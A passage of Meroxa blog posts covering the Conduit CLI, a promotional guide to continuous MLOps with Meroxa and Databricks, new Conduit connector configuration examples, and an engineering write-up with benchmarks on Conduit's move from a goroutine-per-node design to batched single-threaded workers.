| table| string | Target table     |{{.Metadata[opencdc.collection]}}|          | 
+------+--------+------------------+---------------------------------+----------+

Running Conduit

To run Conduit directly from the CLI, simply run:

$ conduit run

This starts Conduit using the specified configurations.

Note: Most CLI commands require Conduit to be running for them to work properly, since they need access to the running components and their details.

Managing Pipelines, Connectors, and Processors

Beyond managing plugins, the Conduit CLI also provides access to pipelines, connectors, and processors. These follow a similar command structure:

Pipelines

List all pipelines: conduit pipelines list
Describe a pipeline: conduit pipelines describe <pipeline-id>

Connectors

List all connectors: conduit connectors list
Describe a connector: conduit connectors describe <connector-id>

Processors

List all processors: conduit processors list
Describe a processor: conduit processors describe <processor-id>

These commands give you more observability over your conduit pipelines and their components.

Why You Should Try Conduit CLI

The new Conduit CLI is an important addition for developers and users working with Conduit. By offering a fast, intuitive, and simple way to manage Conduit components, the CLI will significantly improve productivity and reduce complexity.

Key Benefits:

✅ Easier management of Conduit components via the command line

✅ Clear visibility into available plugins and configurations

✅ Effortless setup with the initialization commands

✅ Faster debugging with detailed descriptions of connectors and pipelines

Get Started Today

The Conduit CLI is available now! If you haven’t already, install Conduit and give the CLI a try. For more details, check out our official documentation.

🚀 Run conduit --help and start exploring today!

As always, we welcome your feedback and contributions to help shape the future of Conduit. Get involved by starting a GitHub Discussion, opening an issue, or joining our Discord server and saying hello to the team behind Conduit! Follow us on Twitter, LinkedIn, and YouTube for more insights and updates!

No More Stale Models: Mastering Continuous MLOps with Meroxa & Databricks

DeVaris Brown — Wed, 05 Feb 2025 12:49:00 GMT

Data drives modern business success, especially in machine learning (ML). But deploying a model just once isn't enough anymore. Today's dynamic environment requires continuous learning, real-time decision-making, and automated feedback loops—core elements of MLOps (machine learning operations). This post shows you how to build a continuous MLOps pipeline using Meroxa for real-time data ingestion and stream processing, paired with Databricks for model development, deployment, and monitoring. You'll learn how to create a high-performing, low-latency ML pipeline that evolves automatically with your data.

What Is MLOps?

MLOps (Machine Learning Operations) is the practice of creating repeatable, scalable processes for developing, deploying, and maintaining machine learning models. It applies DevOps principles—like continuous integration (CI), continuous delivery (CD), and infrastructure as code—to the machine learning lifecycle. This encompasses everything from data collection and feature engineering to model training, validation, deployment, and monitoring.

Most organizations start with pilot ML projects where data scientists build models offline, test them in staging, and hand them to engineering teams for deployment. However, as ML initiatives become mission-critical, managing data pipelines, versioning models, and monitoring performance grows increasingly complex. MLOps provides the framework to address these challenges.

Importance of Real-Time Feedback Loops

Traditional ML pipelines are batch-oriented: data is collected in large chunks, processed offline, and used to retrain models periodically—often monthly or weekly. However, industries like finance, e-commerce, ad-tech, and IoT require near-real-time decisions. Even a few hours' delay can mean missed revenue opportunities or undetected critical events like fraud.

A real-time feedback loop enables models to learn continuously from new data and update their parameters automatically. Combined with robust streaming pipelines and well-orchestrated MLOps practices, real-time feedback helps your models:

Adapt to changing market conditions or user behavior rapidly.
Reduce error rates by incorporating the latest ground truths.
Uncover new patterns or anomalies that weren't visible during initial training.
Provide immediate insights for operational teams and stakeholders.

In short, real-time MLOps is about transforming continuous data flows into continuously improving models.

Meroxa for Data Ingestion and Stream Processing

Meroxa is a real-time data platform that simplifies the creation and management of streaming data pipelines. It offers connectors for a wide range of data sources—databases, SaaS applications, event streams, and more—enabling users to ingest data seamlessly. Through its intuitive interface and APIs, Meroxa streamlines the complexity of moving data from point A to point B without requiring heavy, hand-crafted ETL processes.

Key capabilities include:

Managed Connectors: Pre-built connectors for popular data systems (e.g., PostgreSQL, MySQL, MongoDB, Kafka, Salesforce).
Real-Time Transformations: The ability to process, filter, and enrich data on the fly as it moves through the pipeline.
Low-Code/No-Code Approach: Users can design pipelines with minimal code overhead, making real-time data movement accessible to a broader team.
Event-Driven Architecture: Helps ensure that new data is ingested and processed as soon as it’s available, ideal for use cases demanding low latency.

Why Meroxa Is Ideal for Real-Time MLOps

Machine learning pipelines need continuous, reliable, and high-quality data. In a continuous MLOps scenario:

Data Volume and Velocity: ML pipelines often deal with large data streams—clickstream data, sensor readings, transaction logs—that are best handled by event-driven infrastructure.
Data Quality: Incomplete or inconsistent data can degrade model performance significantly. Meroxa’s transformation and monitoring features help filter noise, validate records, and maintain data hygiene.
Scalability and Flexibility: As data scales, so should the underlying pipeline. Meroxa provides auto-scaling and configuration management to handle spikes in incoming streams.
Real-Time Processing: Low-latency ingestion means that ML models can be retrained or updated quickly when new data indicates a shift in trends.

By offloading the complexities of real-time ingestion and transformations to Meroxa, data teams can concentrate on building better ML models and orchestrating the MLOps pipeline, rather than wrestling with data pipeline intricacies.

Why Databricks for Model Development and Deployment?

Databricks offers a unified data analytics platform built on top of Apache Spark, providing a collaborative environment for data engineering, data science, and machine learning teams. Key components of Databricks relevant to MLOps include:

Delta Lake: A robust data storage layer that allows ACID transactions, schema enforcement, and time travel. This is crucial for maintaining consistency and auditing changes in training data.
Databricks MLflow: A framework for experiment tracking, model versioning, and deployment. MLflow also integrates with popular ML libraries (e.g., TensorFlow, PyTorch, scikit-learn).
Notebook Collaboration: Interactive notebooks allow data scientists and engineers to develop and test models collaboratively in a scalable environment.
Job Scheduling and Workflows: Automate the training, tuning, validation, and deployment steps, integrating them with external systems via REST APIs.

Seamless Integration with Meroxa

In a continuous MLOps pipeline, Databricks acts as the brains for model training and deployment, while Meroxa handles the data flow. The integration can be configured so that:

Live Data Flow from Meroxa to Databricks: Meroxa streams data into a Delta Lake table or an ingestion endpoint that Databricks can consume.
Automated Model Triggering: As new data arrives, Databricks jobs can be triggered to retrain models or update inference pipelines.
Feedback Loop to Meroxa: Databricks can push real-time predictions or insights back to a streaming pipeline, enabling downstream systems to act on them immediately.

By combining Meroxa’s real-time data handling with Databricks’ advanced analytics and ML capabilities, organizations can bridge the gap between raw data ingestion and production-grade model deployment.

Continuous Model Training and Deployment

A hallmark of MLOps is the ability to continually retrain and redeploy models when performance metrics degrade or when data distribution shifts. Databricks facilitates this by:

Experiment Tracking with MLflow: Each training run is logged, along with hyperparameters, metrics, and metadata. If a newer model outperforms the old one, it can be automatically promoted to production.
Model Registry: Databricks’ model registry helps keep track of multiple versions of models, ensuring that only validated versions reach production environments.
Automated Testing: You can automate unit tests for data transformations, model performance tests, and integration tests to ensure that new models maintain or improve performance.

Building Continuous MLOps Pipelines

The diagram above illustrates how data flows from various sources into Meroxa, then into Databricks. Once models are trained, validated, and deployed, the results feed back into the pipeline, creating a continuous loop of data and insight.

Data Sources: Real-time data from transactions, sensors, or logs.
Meroxa Ingestion and Transformation: Meroxa connectors capture and stream data. Transformations (e.g., data cleaning, enrichment) happen in flight.
Data Landing in Delta Lake: Transformed streams land in a Delta Lake table within Databricks for structured storage and ACID compliance.
Model Training Pipeline: A Databricks job automatically triggers to retrain models based on new data availability or on a specific schedule (e.g., every hour or whenever X new records arrive).
Validation and Testing: The newly trained model is validated against test sets. Metrics are recorded in MLflow.
Production Model Deployment: If the new model passes validation thresholds, MLflow or the Databricks model registry updates the model version in the production environment.
Real-Time Inference: The production model can be hosted on Databricks Serving, a REST endpoint, or a streaming pipeline that connects back into Meroxa.
Continuous Feedback Loop: Predictions and performance metrics are fed back into the pipeline, allowing for ongoing monitoring and retraining.

Real-Time Data & Model Workflow

In the sequence diagram above, Meroxa (MX) streams data to Databricks (DB), which trains and validates an ML model. Metrics are tracked in MLflow (MF), and after validation, the new model may replace the existing production model. The pipeline completes when predictions and performance data flow back into Meroxa for real-time consumption by downstream apps.

Set Up Meroxa Pipelines

Configure Connectors: Select source connectors (e.g., a payment gateway, Kafka topic, or user activity logs) and a destination connector for Databricks (or a compatible endpoint).
Apply Transformations: Define real-time transformations such as filtering out invalid records, anonymizing sensitive data, or joining with metadata tables.
Monitor Pipeline Health: Use Meroxa's dashboard or CLI tools to track throughput, latency, and error rates.

Prepare Databricks Workspace

Provision a Cluster: Configure a Databricks cluster with the necessary compute and libraries (Spark MLlib, TensorFlow, PyTorch, etc.)
Create Delta Tables: Set up a Delta Lake table schema to accommodate the transformed data from Meroxa.
Integrate MLflow: Ensure MLflow is enabled for tracking experiments, models, and parameters.

Design the Training Pipeline

Notebook Development: In a Databricks notebook, define your feature extraction steps, model architecture, and training procedures.
Automated Trigger: Use Databricks Jobs to schedule or event-trigger your notebook whenever new data arrives in the Delta table.
MLflow Logging: Log relevant metrics (accuracy, precision, recall, etc.) to MLflow for each run. Store the trained model artifacts in MLflow's model registry.

Validate and Deploy Models

Validation Step: Compare the new model's performance metrics against the currently deployed model.
Release to Production: If performance improvements meet your threshold, automatically deploy the new model to a production endpoint or scheduled job for real-time inference.
Rollback Mechanism: In case of unexpected performance issues, quickly revert to the previously successful model version stored in MLflow.

Advantages of Continuous Feedback

Up-to-Date Models: Frequent retraining with the latest data minimizes model drift and maintains higher predictive accuracy.
Faster Iteration: Real-time feedback loops enable rapid testing of new hypotheses and model architectures, accelerating R&D.
Automated Monitoring: As predictions are generated, key metrics (e.g., accuracy, latency, resource usage) are monitored and fed back into the pipeline, creating a continuous improvement loop.

Minimizing Integration Complexity

While many solutions claim to support real-time pipelines, integration complexity often stalls adoption. Meroxa, by contrast, is purpose-built to reduce friction at every step:

Unified Configuration: Instead of juggling various scripts or YAML files across multiple services, Meroxa provides a centralized interface to configure your data flows. This simplifies the pipeline creation process for data engineers.
Pre-Built Connectors: With a library of managed connectors, you can plug into popular data sources (SQL/NoSQL databases, event buses, SaaS applications) without writing custom code. This shortens the timeline from proof-of-concept to production.
Seamless Databricks Integration: Meroxa automatically routes data to Delta Lake tables or endpoints accessible by Databricks. Configure your pipeline once, and new data flows in near real time—no complicated bridging scripts needed.
Self-Service & Automation: Meroxa's low-code/no-code philosophy lets non-specialists set up and modify streaming pipelines. This frees your core engineering team to focus on higher-level tasks like optimizing models.

Optimizing Total Cost of Ownership (TCO)

Beyond easy integration, cost management is a major factor in evaluating any new platform. Meroxa offers significant TCO advantages by:

Reducing Data Engineering Overhead
- Eliminate Custom Code: Every hour spent coding one-off connectors or troubleshooting ingestion scripts adds cost. Meroxa's managed connectors reduce the burden on developers and accelerate time-to-market.
- Streamlined Maintenance: Automated pipeline monitoring, schema change handling, and alerting minimize ongoing maintenance. Fewer break-fix cycles mean lower operational costs.
Optimizing Compute Resources
- Real-Time Stream Processing: Meroxa processes data continuously, avoiding batch processing spikes. Resources scale with data flow instead of running at full capacity on fixed schedules.
- Targeted Transformations: Pre-processing data in flight ensures only relevant data reaches Databricks or Delta Lake. This upstream filtering reduces storage and CPU usage, especially for large datasets.
- Auto-Scaling & Pay-as-You-Go: Meroxa automatically scales pipeline resources as data volumes change. This ensures you pay only for needed capacity, avoiding costly over-provisioning.
Enhancing Model Efficiency
- Higher-Quality Input: Cleaner, more consistent data leads to more effective training runs. Models converge faster and need fewer re-runs, saving Databricks compute costs.
- Faster Iterations: Quick model updates catch performance issues early, preventing wasted compute on suboptimal versions.

In short, Meroxa's approach to data ingestion and stream processing accelerates ML project delivery while controlling compute and operational expenses. When combined with Databricks' scalable environment, you get a cost-effective, robust platform for real-time MLOps at enterprise scale.

Real-World Applications & Benefits

Real-time data ingestion and continuous MLOps aren’t just buzzwords; they solve pressing, bottom-line challenges across various industries. Here’s how it looks in practice, with Meroxa and Databricks delivering rapid, adaptive machine learning.

E-Commerce

Challenge

E-commerce companies often rely on outdated or batch-driven recommendations, resulting in stale product suggestions that don’t reflect a user’s most recent clicks and purchase behavior. The result? Low engagement and missed upsell opportunities.

Solution

With Meroxa handling real-time clickstream ingestion, raw event data (page views, shopping cart activity, searches) continuously streams into Databricks and updates ML models in near real time. As soon as a user clicks on a product, that data is transformed and available for on-the-fly recommendation model retraining or feature updates.

Impact

Personalized Offers: Visitors immediately see recommendations based on their latest browsing.
Increased Conversions: By serving fresh, relevant suggestions, conversion rates climb.
Scalable Growth: Auto-scaling real-time pipelines handle peak traffic during sales events without over-provisioning.

E-Commerce Real-Time Flow

In this flow, Meroxa ingests high-velocity click events, Databricks trains or updates the recommendation model, and the production environment serves personalized suggestions back to the user in seconds.

Finance

Challenge

Banks and payment providers need to detect fraudulent transactions in real time. Traditional batch-based models may flag suspicious activities hours or even days late—leading to financial losses and reputational damage.

Solution

By streaming live transaction records into Meroxa from point-of-sale systems and online payment gateways, data is instantly enriched (e.g., geolocation, user profile) and passed into Databricks for anomaly detection model scoring. If anomalies are detected, the system immediately flags or halts suspicious transactions.

Impact

Reduced Fraud Losses: Instant detection cuts down on unauthorized activity before it escalates.
Regulatory Compliance: Updated models help maintain compliance with fast-changing financial rules.
Improved Customer Trust: Swift fraud alerts demonstrate robust security measures, boosting brand reputation.

Finance Real-Time Fraud Detection Flow

Meroxa collects transactions from multiple sources (POS, online gateways), enriches them, and streams them into Databricks for real-time anomaly detection. Suspicious activities trigger alerts to both internal teams and potentially to the customers themselves.

Healthcare

Challenge

Healthcare providers struggle to monitor critical patient data—like heart rate or blood pressure—across thousands of IoT devices, creating a data deluge that’s hard to analyze quickly for early warning signs of complications.

Solution

Meroxa ingests continuous sensor readings from wearables or in-facility devices, applying transformations for noise reduction and anonymization. Databricks then applies advanced ML models (e.g., anomaly detection) to flag unusual trends in real time. Alerts are pushed back to clinicians or care teams almost instantly.

Impact

Proactive Patient Care: Immediate alerts allow medical staff to intervene before minor symptoms become major crises.
Scalable Management: Cloud-based streaming and MLOps can handle thousands (or millions) of devices without bottlenecks.
Enhanced Research: Rich real-time data informs predictive studies, improving overall treatment protocols.

Healthcare Real-Time Monitoring Flow

Here, Meroxa handles secure, high-volume ingestion from IoT health devices. Databricks processes and flags critical anomalies so caregivers can respond proactively.

Manufacturing & IoT

Challenge

Factories rely on heavy machinery that can suddenly fail, causing unplanned downtime, safety issues, and lost revenue. Traditional maintenance schedules (weekly or monthly checks) don’t catch emerging problems in real time.

Solution

By streaming sensor data (temperatures, vibration readings, pressure gauges) through Meroxa, anomalies in the data are immediately spotted. Databricks models—trained on historical fault patterns—predict potential failures before they happen, triggering maintenance orders or system shutdowns to prevent accidents.

Impact

Reduced Downtime: Proactive interventions ensure machines stay operational.
Cost Savings: Avoiding catastrophic failures saves on repair bills and production delays.
Operational Safety: Real-time alerts protect workers and assets by halting malfunctioning equipment.

Manufacturing & IoT Predictive Maintenance Flow

Sensor data is continuously ingested by Meroxa, then used within Databricks to score for potential failures. Alerts can either notify human operators or automatically shut down risky equipment to avoid accidents.

Why This Matters

Across industries, these use cases demonstrate the clear competitive advantage of continuous MLOps:

Live Data ⇒ Timely, relevant predictions
Automated Model Updates ⇒ Adaptive to changing conditions
Real-Time Insights ⇒ Proactive, data-driven decisions

From e-commerce startups to global banks, Meroxa + Databricks transforms raw data into actionable intelligence—protecting revenue, boosting customer satisfaction, and driving innovation.

Conclusion

A continuous MLOps pipeline with real-time feedback loops has become essential for staying competitive in today's data-driven markets. By pairing Meroxa's real-time data ingestion and stream processing capabilities with Databricks' powerful model development, deployment, and monitoring tools, you can build an end-to-end system that evolves seamlessly with new data.

Key Takeaways:

MLOps Is the Future of ML: Traditional ad-hoc machine learning approaches can't keep pace with today's evolving data and business needs. MLOps delivers the repeatability, scalability, and maintainability modern organizations require.
Real-Time Feedback Loops Drive Better Outcomes: By incorporating streaming data into your pipeline, your models learn faster and maintain higher accuracy over time.
Meroxa and Databricks Form a Powerful Tandem: Build intelligent solutions without reinventing data pipelines and machine learning infrastructure from the ground up.
Start Small, Scale Fast: Begin your continuous MLOps pipeline with a single use case, then expand the framework to additional data sources and models as you grow.
Minimal Friction & Strong ROI: Meroxa's seamless integration and cost-optimizing features make adopting real-time pipelines easier, delivering faster time-to-value and lower TCO.

Ready to see how Meroxa and Databricks can transform your ML initiatives? Connect with our team or start a proof of concept (POC). With the right tools and architecture, you'll be delivering scalable, insightful, and responsive machine learning solutions in no time.

Interested in learning more?

Visit Meroxa to see how their platform simplifies real-time data pipelines. Follow us on Twitter, LinkedIn, and YouTube for more insights and updates!

Unlock New Possibilities with Meroxa's Conduit OSS: New Connectors for Developers

Dion Keeton — Fri, 31 Jan 2025 10:25:00 GMT

At Meroxa, we’re empowering developers with Conduit OSS, a tool that simplifies real-time data engineering. With our latest release of new connectors, integrating with popular platforms is seamless, accelerating development and delivering real-time data insights. Here's a look at what's available now and what's coming next!

Released: New Conduit OSS Connectors

1. Salesforce Connector

Stream Salesforce object changes using the Salesforce Streaming API.

Configuration Example:

salesforce-source:
  type: source
  plugin: standalone:salesforce
  settings:
    auth.client_id: "<client_id>"
    auth.client_secret: "<client_secret>"
    auth.username: "<username>"
    auth.password: "<password>"
    api.version: "v52.0"

Use Case: Sync Salesforce opportunities to Snowflake for real-time sales insights.

2. Amazon Kinesis Connector

Integrate high-throughput streams to Kinesis for real-time analytics.

Configuration Example:

kinesis-destination:
  type: destination
  plugin: standalone:kinesis
  settings:
    aws.region: "us-east-1"
    aws.access_key_id: "<access_key>"
    aws.secret_access_key: "<secret_key>"
    stream_name: "my-data-stream"

Use Case: Stream IoT data for real-time monitoring and alerts.

3. Amazon SQS Connector

Simplify message handling with Amazon Simple Queue Service (SQS).

Configuration Example:

sqs-source:
  type: source
  plugin: standalone:sqs
  settings:
    aws.region: "us-west-2"
    aws.access_key_id: "<access_key>"
    aws.secret_access_key: "<secret_key>"
    queue_url: "https://sqs.us-west-2.amazonaws.com/123456789012/my-queue"

Use Case: Queue tasks for downstream services in a microservices architecture.

4. Elasticsearch Connector (Source)

Stream Elasticsearch index data into your pipelines for further analysis.

Configuration Example:

es-source:
  type: source
  plugin: standalone:elasticsearch
  settings:
    elasticsearch.url: "http://localhost:9200"
    elasticsearch.index: "my-index"

Use Case: Extract logs for storage in a data lake or for further processing.

5. Amazon DynamoDB Connector (Source)

Leverage DynamoDB Streams for real-time updates, inserts, and deletes.

Configuration Example:

source:
  type: source
  plugin: standalone:dynamodb
  settings:
    aws.region: "us-east-1"
    aws.access_key_id: "<access_key>"
    aws.secret_access_key: "<secret_key>"
    table_name: "my-table"

Use Case: Replicate data from DynamoDB to a relational database for reporting.

Coming Soon: Expanded Capabilities

1. MySQL Connector

Stream real-time MySQL changes with Change Data Capture (CDC).

Planned Configuration Example:

source:
  type: source
  plugin: standalone:mysql
  settings:
    mysql.host: "localhost"
    mysql.user: "root"
    mysql.password: "password"
    mysql.database: "mydb"

Use Case: Synchronize MySQL data with cloud data warehouses for real-time analysis.

2. SFTP Connector

Automate file ingestion from SFTP servers into your pipelines.

Planned Configuration Example:

source:
  type: source
  plugin: standalone:sftp
  settings:
    sftp.host: "sftp.example.com"
    sftp.username: "user"
    sftp.password: "password"
    file_pattern: "*.csv"

Use Case: Import nightly batch files for processing in data lakes or warehouses.

Why Developers Love Conduit OSS

Developer-Centric Design: Pre-built connectors save time and effort.
Real-Time Ready: Instantly access, stream, and process data.
Scalability: Handles large data loads effortlessly.
Flexibility: Easily configure sources and destinations for any workflow.
Free and Transparent: As an open-source project, Conduit OSS is free to use, modify, and extend.

Get Started Today

Explore these connectors and start building:

Join the Community

Collaborate with fellow developers and contribute to Conduit OSS on GitHub or Discord. Share your feedback and ideas to help us expand the ecosystem with new connectors and features.

Have managed platform needs? Request a demo with one of our expert team members today!

Optimizing Conduit - 5x the Throughput

Lovro Mažgon — Wed, 29 Jan 2025 12:53:00 GMT

Conduit has been a public tool for more than 3 years now. When we first started developing Conduit the goals were clear - make a simple-to-use data streaming tool that "just works". Since we started from scratch, we were following the old advice of "make it work, make it right, make it fast". We focused on getting the functionality right and picked an architecture that gave us the flexibility the project needed at the start, without focusing as much on performance.

After years of developing Conduit and operating it on our platform, running thousands of pipelines, we were finally in a place where we could, without a doubt, tick off the first two. Conduit worked correctly as set out at the start and the code was structured in a way that allowed us to easily extend its functionality. Now we found the time to focus on the last part of the advice - "make it fast".

After benchmarking and profiling the code we quickly identified the bottlenecks in Conduit's internal streaming engine. We realized that a new architecture would not only have a great impact on the throughput but also simplify the code. Win-win!

The Old Architecture: Strengths and Limitations

Let's first give you an overview of the old architecture, why we chose it in the first place and what were its limitations.

Directed Acyclic Graph (DAG)

A data pipeline is in essence a directed acyclic graph (DAG), where data is moving from one or multiple sources through one or multiple processors that process the data towards one or multiple destinations. Now, if we draw such a DAG, we can easily see that each node in the graph receives data from a previous node and passes it on to the next node. Conceptually, this perfectly fits the classic way Go encourages developers to write concurrent code, where each goroutine communicates with other nodes using a shared channel.

Here’s what a DAG could look like in a typical pipeline.

So this is exactly what we modeled in our code. Every node in the DAG was a separate goroutine that was responsible for doing one specific task. The goroutines passed data to each other using unbuffered channels. This software architecture is close to the mental model developers generally use when thinking about a data pipeline. Since we just started working on the project and didn't have a clear idea of all the features we wanted to implement in a Conduit pipeline, this seemed like a straightforward choice. It gave us the flexibility of creating different pipelines by connecting nodes together any way we pleased. In the end, we settled on the Conduit pipeline structure we all know and love today - one or multiple sources at the start, one or multiple destinations at the end, and processors that act on the whole pipeline or on a single source or destination.

The Good

This architecture made it very easy to implement two very valuable guarantees - the ordering guarantee and backpressure. Go channels already guarantee that data written to a channel by one goroutine will be received on the other end in the same order. Since we only ever had a single goroutine writing to a channel and a single goroutine reading from it, the data always flowed through the pipeline and reached the destination in the same order as it was produced by the source.

We also decided to use unbuffered channels. An unbuffered channel can only be written to if there is another goroutine reading from that channel, otherwise the writer is blocked. This essentially means that any node in the DAG can only send data to the next node if the next one is ready to receive the data. This resulted in backpressure being applied over the whole pipeline. The speed of the slowest destination thus dictated the speed of the whole pipeline, since sources would be blocked trying to send data to the next node if the last node (destination) was busy writing a record.

The fact that we used nodes also allowed us to easily implement things like parallel processors and the stream inspector. The basic building blocks did not have to change, instead, we simply adjusted the topology of the pipeline by adding additional nodes or connecting them in a different way.

The Bad

However, there were limitations to the architecture. First, to keep things simple, we made it a rule that nodes only ever operate on a single record. This allowed us to reason about our code and made it easy to make sure all records were accounted for and flushed when a pipeline was stopped. However, this also meant that batching records was off the table. This was the single biggest bottleneck of the old architecture, since processing records and sending them through channels one by one resulted in lots of handovers between goroutines. When profiling the code we noticed that the nodes spent most of the time writing or reading from a channel. Reducing this overhead was a huge opportunity for optimization.

We realized that managing a huge number of goroutines can get out of hand quickly. Edge cases that can happen in a highly concurrent environment can be non-intuitive for humans to figure out and even harder to test and reproduce consistently. Even though each node was a relatively simple building block by itself, the complexity of orchestrating them was that much higher, especially when a node unexpectedly stopped and things had to be cleaned up.

The Ugly

Debugging a pipeline that's composed of dozens of goroutines can suddenly become a day-long task. If you are so lucky that you can reproduce the issue, you still have to find the goroutine causing it. Well, if the cause is a single goroutine, that is. Odds are that the issue is caused by multiple goroutines interacting in a certain way.

And then there are the two worst things that can happen in a concurrent environment, panics and blocks. A panicking goroutine will bring down the whole application, so recovering and converting panics to an error is crucial. This is easily done if you are in charge of spawning the goroutines, but you need to be consistent or use a library like conc to do it for you. Blocking goroutines are harder to prevent. If a bug in the code causes a goroutine to block forever, you can't force it to stop from another goroutine. And the more goroutines you have, the higher the chances of ending up with an uncaught panic or a blocked goroutine.

The New Architecture: Simplicity and Performance

We utilized the lessons we learned from implementing the old architecture, benchmarks and profiles, and decided to implement a new streaming engine, designed with simplicity, performance, and maintenance in mind.

The Worker-Task Model

While the Go community often emphasizes the power of goroutines and channels for concurrent programming, our experience showed that overusing these abstractions introduced overhead that became a bottleneck. Although the node architecture offered flexibility, it didn't meet our performance needs because the pipeline still operated sequentially, which meant that we didn't benefit from parallel processing. Each record had to go through multiple nodes, adding latency and reducing throughput due to the overhead of managing these intermediate steps.

We decided to remove the unnecessary concurrency and embrace a single-threaded approach. This way we gained significant performance improvements while making the code easier to understand and debug. The result is a leaner, faster, and more maintainable engine that retains all the reliability guarantees our users expect from Conduit.

The new architecture operates with a single-threaded worker per source. Each worker executes a sequence of tasks, representing the stages of the pipeline:

Source tasks: Collect a batch of records from the source connector.
Processor tasks: Transform, filter, or enrich the batch of records.
Destination tasks: Send the processed batch to the destination connector.

Unlike the previous DAG-based approach, where records are moved between nodes via channels, the new model processes batches end-to-end within the same worker. This eliminates the overhead of inter-goroutine communication and reduces context switching.

Besides cutting down on goroutines we also introduced the ability to process batches of records, which dramatically decreased the time spent on guiding records through the pipeline, since those operations were now executed only once per batch and not once per record. Note that what we call "batch" in Conduit could be considered a "micro-batch", since the size is very small and it's flushed every few seconds. The purpose is simply to reduce the number of operations per record and the number of round-trips to external systems. Users are in charge of defining the maximum batch size and the delay after which a batch is flushed, so the old behavior of streaming every record separately is still achievable and sometimes even preferable (e.g. to reduce latency in a pipeline that doesn't expect a high load in the first place).

Backward Compatibility and Guarantees

An important goal of the new architecture was to keep the new engine backward compatible and retain the same guarantees that we provided in the old architecture, specifically the ordering guarantee and backpressure.

Given that records from a specific source need to reach the destination in the same order as they are produced on the source, we decided to use a single worker per source to not fall into the trap of having to orchestrate the order across multiple workers. This made it trivial to implement backpressure since a worker is only ever processing one batch at a time, so the source is not able to produce another batch until the last one is processed end-to-end.

However, because we introduced batching, the ordering guarantee was a tougher nut to crack. You have to consider acknowledgments to understand why this was not simple:

Ordered acknowledgments: Records must reach the destination in the same order as produced by the source. At the same time, acknowledgments must propagate back to the source in order.
Acknowledgments are done per record: Conduit sends acknowledgments back to the source connector for specific records, not for whole batches, as batches can be partially processed.
Records need to be end-to-end processed: Only records that reach the end of the pipeline can be successfully acknowledged. "The end of the pipeline" could be the dead-letter-queue (DLQ) or a destination.

To illustrate these challenges, let's dive deeper with an example.

Consider a pipeline with 1 source, 1 processor and 1 destination. The records produced by the source are supposed to contain URLs, which the processor uses to fetch more data and enrich the records.

Let's say the source produces a batch of 5 records and the worker supplies them to the processor. The processor processes all records successfully, except the 3rd record, which contains a malformed URL. Now, what should the worker do in this case to correctly honor the ordering guarantee?

Write to DLQ first

One idea would be to send the 3rd record to the DLQ right away, remove it from the batch, and send the remaining 4 to the destination. However, if the 3rd record is successfully written to the DLQ while the rest fails to be written to the actual destination, the ordering guarantee is violated.

Write to the destination first

What if we remove the 3rd record from the batch and first send the remaining 4 to the destination before sending the 3rd one to the DLQ? Again, the ordering guarantee can be violated if the 4 get successfully written to the destination, but the 3rd record fails to be written to the DLQ. In this case, the pipeline would stop, because the 3rd record failed to be written to any destination as well as the DLQ. The next time the pipeline is started, it would continue from the last acknowledged record. But since we have already written and acknowledged record 5, the pipeline will continue with record 6 and lose 3 forever.

Split batch

The only correct thing to do is to split the batch into separate sub-batches:

The first sub-batch contains records 1 and 2, which are sent to the destination as a single batch. Only once those are processed end-to-end and acknowledged can we continue to the next record.
The second sub-batch contains only the 3rd record. The record is written to the DLQ, and if successful, it means the record has reached its end of the pipeline and can be acknowledged.
Now the remaining records 4 and 5 can be sent to the destination as a single batch. Even if this operation fails, the records can safely be written to the DLQ, without violating any ordering guarantees.

The example can get much more convoluted if you imagine multiple processors that fail to process multiple non-consecutive records in a batch. The generic solution we came up with is splitting the batch into sub-batches of consecutive records that are either all successfully or unsuccessfully processed. This approach allows us to retain the end-to-end ordering guarantee even in the face of failures.

Performance Benchmarks

Benchmark Setup

We tested the performance of the new architecture compared to the old architecture in an end-to-end test using the simplest pipeline you can build in Conduit. The source generates records as fast as possible, while the destination logs them with the level "trace", so the records don't show up in the log (Conduit by default only displays INFO and higher levels). Both connectors are built-in ones which further minimizes the effect of connectors on the test.

Here is the pipeline configuration file we used for our tests:

version: 2.2
pipelines:
  - id: benchmark
    status: running
    connectors:
      - id: generator
        type: source
        plugin: builtin:generator
        settings:
          format.type: file # take payload from file, to skip generation overhead
          format.options.path: ./payload.txt # different payload sizes - 25B, 1kB, 10kB
          sdk.batch.size: 10000 # different barch sizes - 1, 10, 100, 1000, 10000
          sdk.batch.delay: 0s # turn off time based batch collection
      - id: log
        type: destination
        plugin: builtin:log
        settings:
          level: trace

We used different scenarios, to get a better overall picture of the performance:

We tested different batch sizes (1, 10, 100, 1.000 and 10.000) by changing the sdk.batch.size field on the source connector.
We tested different payload sizes (25B, 1kB, 10kB) by adjusting the format.options.path and supplying a file of the corresponding size.

We ran all pipelines on both the old and the new architecture, therefore we tested a total of 30 pipelines. While the pipelines were running we were collecting metrics using Prometheus and analyzed them with Grafana. We were specifically interested in the average throughput (messages per second) and the average latency of a message (i.e. how long it takes for a message to flow from the source to the destination).

The tests were executed using Conduit v0.12.3 on a 2024 MacBook Pro with the M4 Max CPU and 36GB of RAM.

Results

For a payload size of 25 bytes, the new architecture achieved a peak message rate of 569,000 messages per second with a throughput of 13.6 MB/s at a batch size of 10,000. In comparison, the old architecture could only process up to 117,000 messages per second, achieving a throughput of 2.8 MB/s under similar conditions. Latency in the new architecture remained under 1 millisecond for smaller batch sizes and scaled efficiently, reaching 10-25 milliseconds even with a batch size of 10,000. That's half the latency we observed in the old architecture.

Note that we are measuring the throughput based on the raw payload size in the source. Every record has metadata attached, like when it was read, the source connector ID, the source connector plugin name and version, etc. Because the payload size is only 25 bytes, the metadata is much larger than the payload in this scenario. So even though the throughput in terms of MB/s might seem low, keep in mind that the actual message size is much larger, and Conduit is pushing more than half a million records per second through the pipeline.

Testing a more realistic scenario with 1 KB payloads, the new architecture reached a peak throughput of 267.6 MB/s, corresponding to 274,000 messages per second with a batch size of 1,000. This marks a substantial improvement over the old architecture, which peaked at 98,000 messages per second and 95.7 MB/s. Latency remained under 1 millisecond for smaller batch sizes and scaled gracefully to 25-50 milliseconds for larger batches.

With 10 KB messages, the new architecture delivered a throughput of up to 507.8 MB/s, representing a significant increase from the old architecture's peak throughput of 380.9 MB/s. The message rate in the new architecture rose to 52,000 messages per second at the highest batch size tested, compared to 39,000 messages per second in the old architecture. Curiously, the old architecture achieved a better throughput in the case of no batching (batch size of 1), although the difference was negligible and was made up by higher throughputs when batching was enabled.

Overall, the new architecture outperformed the old one in almost all tested scenarios, particularly excelling in high-throughput and low-latency applications. These improvements demonstrate the effectiveness of the architectural changes in enhancing performance across varying message sizes and batch configurations.

Conclusion: The Future of Conduit

